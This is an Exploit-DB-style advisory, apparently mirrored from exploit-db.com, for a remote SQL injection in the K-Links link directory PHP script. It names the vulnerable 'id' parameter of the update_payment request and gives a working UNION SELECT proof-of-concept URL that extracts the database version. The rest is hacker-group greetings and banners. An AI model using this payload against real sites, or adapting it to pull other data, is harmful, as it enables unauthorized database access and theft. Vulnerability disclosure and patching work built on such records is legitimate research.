K-Links – Link Directory Script SQL Injection - 体验盒子

作者： R3d-D3V!L
日期： 2011-04-11
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/17146/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
[~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: http://turn-k.net 
[+] Software: K-Links
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: N0W... !AM W0RK!NG AL0NE
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: ll.4Pr.2oll 
[?] T!ME: 05:15 am GMT 
[?] Home: .........
[^]

[?] 
======================================================================================
#suFFEr Fr0M REMOTE SQL iNJECTioN Vulnerabilities
======================================================================================

[*] Err0r C0N50L3: 


http://www.site.com/index.php?req=update_payment&id= EV!L INJECT!ON 



[*] prove of concept =

http://www.site.com/index.php?req=update_payment&id=-4410+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
 


Already Tested on Win Xp 

[~]-----------------------------{((BLACk-hAT))}------------------------------------------------ 
# ;
# ;
[~] Greetz tO: .................................................................... no one deserved ;
#
[~]70 ALL ARAB!AN HACKER 3X3PT : .......................................LAM3RZ #;
#
[~] spechial thanks :...................................... no one deserved# ; 
#
[?]spechial SupP0RT : ................MY M!ND # �;
#
[?]---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #;
#
[~]spechial FR!ND:........................................no one deserved #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------